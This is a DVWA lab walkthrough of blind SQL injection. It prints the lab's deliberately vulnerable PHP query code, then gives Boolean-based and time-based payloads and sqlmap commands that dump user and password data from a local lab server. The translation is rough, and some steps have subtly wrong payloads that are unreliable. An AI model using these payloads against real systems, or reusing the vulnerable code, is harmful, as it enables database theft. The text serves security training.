SQL Injection (Blind)
interface
Source code
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
// Get input
$id = $_GET[ 'id' ];
// Check database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors
// Get results
$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
if( $num > 0 ) {
// Feedback for end user
echo '<pre>User ID exists in the database.</pre>';
}
else {
// User wasn't found, so the page wasn't!
header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
// Feedback for end user
echo '<pre>User ID is MISSING from the database.</pre>';
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
Code analysis
By finding whether the id entered by the user exists, if it exists, it will print: User ID exists in the database; if it does not exist, it will print: User ID is MISSING from the database. It can be seen that the ID entered by the user has not been judged legally, and there is a SQL vulnerability
Infiltration step
Three ideas are given, one is the blind injection based on Boolean, the other is blind injection based on time, and the last one is to use sqlmap to obtain the result
1. Boolean-based blinds
The first step: construct the sentence: 1’ and 1=1#check the result and find that there is a hint.
Step 2: construct the sentence: 1’ and 1=2#check the result and find that the hint is not there. From the first and second steps, it can be seen that if the following statement is correct, it will be prompted to exist, otherwise the prompt does not exist.
Step 3: Guess the number of bids in the current database and construct the statement:, 1’ and length(select count(table_name) from information_schema.tables where table_schema=database())=x#by changing the value of x, when the prompt exists, x The value of indicates that there are several tables. When the result shows that x=2, it prompts that there is a
fourth step: Guess the length of the first table name, construct the statement:, 1’ and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=x#change the value of x, until the system prompts, x is the length of the table name, the result: x=9
Step five: Use the 2-point method to guess the table name and construct the statement:, 1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>x#where is the ascii value of the letter. 65-90 are 26 uppercase English letters, 97-122 are 26 lowercase English letters. First let x=97, check if it is lowercase, then let x=109 and so on, guess the table name: guestbook, users
No. Step 6: Guess the length of the first field of the table, construct the sentence:, the 1’ and length(select column_name from information_schema.columns where table_name= ’users’ limit 0,1)=x#method is the same as the fourth step, the result x=8
Step Seven: Guess the first field of the table, construct the statement:, the 1’ and length(select column_name from information_schema.columns where table_name= ’users’ limit 0,1)=x#method is the same as the fifth step.
2. Time-based blinds
The first step: Guess whether there is a time-based blind bet. Input: 1’ and sleep(5)#After that, a noticeable delay is felt; after inputting 1 and sleep(5)#, there is no delay. From this, it is judged that there is a character-type time blind injection.
Step 2: The same steps as the Boolean-based blind injection. Guess the database table name and construct the statement:, 1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) #no delay; 1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #obvious delay, indicating that the first table name has 9 characters .
The third step: After constructing the sql statement is the same as Boolean, but adding sleep(5) and judging the delay.
Three, use sqlmap,
Install sqlmap on win10. The
first step: input anything, use burp suit to capture the packet, and get the destination address :; 192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#cookie: the security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5
second step: use sqlmap to inject the URL, enter:, sqlmap.py -u “http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5” --batchafter a while, sqlmap gives the test result, you can Inject in three ways: Boolean, error-base and time.
Step 3: Use sqlmap to view the database. Input: sqlmap.py -u “http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5” --batch --dbs
Step 4: View the content in the dvwa database. Input: sqlmap.py -u “http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5” --batch -D dvwa --tables
Step 5: View the content in the users table. Input: sqlmap.py -u “http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5” --batch -D dvwa -T users --columns
Step 6: View the contents of user and password, enter:, sqlmap.py -u “http://192.168.45.148/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie=” security=low; PHPSESSID=v56k2chlsm80lm6i11pqj4p7o5” --batch -D dvwa -T users -C “user,password“ --dumpand then you can see the process of sqlmap decoding the encrypted password, and after a while, you can see the plaintext after sqlmap is decoded.
